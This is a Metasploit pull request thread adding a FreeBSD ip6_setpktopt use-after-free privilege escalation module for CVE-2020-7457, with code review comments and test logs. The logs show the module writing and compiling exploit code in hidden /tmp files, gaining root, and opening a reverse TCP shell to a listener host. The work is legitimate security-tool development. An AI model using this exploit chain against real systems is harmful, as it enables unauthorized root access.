Add FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation module
rapid7/metasploit-framework pull request #13837
Opened 2020-07-09 22:40 UTC by bcoles

2020-07-16 20:37 UTC, smcintyre-r7 requested changes
Reviewed and left a few minor change requests, code looks great over all.

2020-07-16 20:37 UTC, smcintyre-r7 commented on modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
> +    end
Looks like you can just use the `Exploit::Remote::AutoCheck` mixin and remove the `ForceExploit` datastore option.

2020-07-16 20:37 UTC, smcintyre-r7 commented on modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
> +    vprint_status("Using allproc offset: #{my_target[:allproc]}")
It would be nice to print the target as well, especially if it was automatically selected.

2020-07-16 20:37 UTC, smcintyre-r7 commented on modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
> +    Rex.sleep(3)
I don't think `Rex.sleep` is necessary any more, the regular `sleep` builtin should work just fine.

2020-07-16 20:40 UTC, smcintyre-r7 commented on documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md
> +  A directory where we can write files (default: `/tmp`)
Can you please dedent each of these sections? Especially `## Options` and `## Scenarios` where the indentation changes how it's rendered:

## Indented

![image](https://user-images.githubusercontent.com/58950994/87720490-0367d100-c783-11ea-9585-93f4acf81514.png)

## Not Indented

![image](https://user-images.githubusercontent.com/58950994/87720541-17133780-c783-11ea-8295-b6b82a7ab5ba.png)

2020-07-16 20:52 UTC, bcoles commented on documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md
> +  A directory where we can write files (default: `/tmp`)
done

2020-07-16 21:05 UTC, bcoles commented on modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
> +    Rex.sleep(3)
done

2020-07-16 21:05 UTC, bcoles commented on modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
> +    vprint_status("Using allproc offset: #{my_target[:allproc]}")
done

2020-07-16 21:05 UTC, bcoles commented on modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb
> +    end
done

2020-07-21 19:01 UTC, smcintyre-r7 approved these changes

2020-07-22 13:42 UTC, smcintyre-r7 commented
Well testing this from the current branch fails with the following error. If you could rebase this work onto `master` that would make testing easier.

```
msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[-] Exploit failed: NoMethodError undefined method `is_root?' for #<Msf::Modules::Exploit__Freebsd__Local__Ip6_setpktopt_uaf_priv_esc::MetasploitModule:0x000000000b1e24d0>
Did you mean?  is_a?
[*] Exploit completed, but no session was created.

```

I moved past that though and tested it from a merged state at which point it appears to have failed to compile. The target is a stock FreeBSD 12.0 system with `cc` installed.

```
msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] System architecture amd64 is supported
[+] FreeBSD 12.0-RELEASE r341666 GENERIC  appears vulnerable
[+] cc is installed
[+] The target appears to be vulnerable.
[*] Using target: FreeBSD 12.0-RELEASE r341666 - allproc offset: 0x1df3c38
[*] Writing '/tmp/.2Uc72Fr.c' (14162 bytes) ...
[*] Max line length is 131073
[*] Writing 14162 bytes in 1 chunks of 52038 bytes (octal-encoded), using printf
[*] Compiling /tmp/.2Uc72Fr.c ...
[-] error: unable to execute command: Executable "" doesn't exist!
[-] Exploit aborted due to failure: unknown: /tmp/.2Uc72Fr.c failed to compile
[*] Exploit completed, but no session was created.
```

2020-07-22 13:45 UTC, bcoles commented
> If you could rebase this work onto master that would make testing easier.

No thanks. It is literally a 3 line change. or just drop the `.rb` file in master.

2020-07-29 19:38 UTC, smcintyre-r7 commented
Alright tested successfully with a session opened via `auxiliary/scanner/ssh/ssh_login`. Now this is interesting because when I tested it via `exploit/multi/ssh/sshexec` and the `bsd/x64/shell_reverse_tcp` payload it failed consistently to compile with the error I had mentioned `error: unable to execute command: Executable "" doesn't exist!`. Upon further testing it also works with a session opened from `cmd/unix/reverse_openssl` using sshexec, so I'm thinking it's an issue within the payload and not necessarily the module. Definitely something to be aware of though.

<details>
<summary>Testing output</summary>

```
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i -1
[*] Starting interaction with 6...

To see how much disk space is left on your partitions, use

	df -h
		-- Dru <genesis@istar.ca>
id
uid=1001(smcintyre) gid=1001(smcintyre) groups=1001(smcintyre)
^Z
Background session 6? [y/N]  y
msf5 auxiliary(scanner/ssh/ssh_login) > previous 
[*] Using configured payload bsd/x64/shell_reverse_tcp
msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > show options 

Module options (exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on.


Payload options (bsd/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Using target: FreeBSD 12.0-RELEASE r341666 - allproc offset: 0x1df3c38
[*] Writing '/tmp/.GQ8WGbv.c' (14162 bytes) ...
[*] Compiling /tmp/.GQ8WGbv.c ...
[*] Writing '/tmp/.MC4Wn' (218 bytes) ...
[*] Launching exploit (timeout: 30s) ...
[*] uid=0(root) gid=0(wheel) egid=1001(smcintyre) groups=1001(smcintyre)
[+] Success! Executing payload...
[*] Command shell session 7 opened (192.168.159.128:4444 -> 192.168.159.43:23808) at 2020-07-29 15:19:56 -0400
[+] Deleted /tmp/.GQ8WGbv.c
[+] Deleted /tmp/.GQ8WGbv
[+] Deleted /tmp/.MC4Wn

id
uid=0(root) gid=0(wheel) egid=1001(smcintyre) groups=1001(smcintyre)
```

2020-07-29 19:41 UTC, merged

2020-07-29 19:43 UTC, smcintyre-r7 commented
# Release Notes
This adds a local privilege escalation exploit for CVE-2020-7457 which is a Use After Free in the network stack of FreeBSD kernel versions 9.0 - 12.1.